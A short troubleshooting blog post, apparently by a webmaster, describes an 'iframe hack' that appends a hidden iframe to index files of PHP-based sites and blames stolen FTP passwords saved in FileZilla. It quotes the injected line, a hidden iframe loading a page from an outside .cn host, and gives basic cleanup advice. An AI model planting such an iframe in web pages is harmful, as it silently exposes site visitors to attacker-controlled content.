Get rid of the new ‘iframe’ hack or virus from attacking index(.html/.htm/.php) files
‘iframe’ hack or virus which is the most annoying thing that every webmaster facing in these days. Mostly users of Wordpress, Joomla, Drupal and other PHP scripts. Even i am also victim of this hack.
So what is this ?
After a deep study considering so many cases i found that the main theme of this ‘iframe’ hack is blocking website by attacking index(.html/.htm/.php) files by adding iframe at the end of index file looks like…
<iframe src="http://bigtopfestival.cn:8080/index.php" width=159 height=113 style="visibility: hidden"></iframe>
in which way ?
Most of experts said that it is a ‘FTP Password Hack‘ get in through ftp manager mostly through filezilla.
What we have to do ?
Please keep your ftp password very safe even from your ftp manager.That means don’t save your passwords in ftp manager and try to enter password each time that you login.
if you are already exploited by it, replace that effected index file to original if you have a backup one.and must change your ftp password, if you have no access to chanage then ask your webhost to change.
Category: Troubleshooting
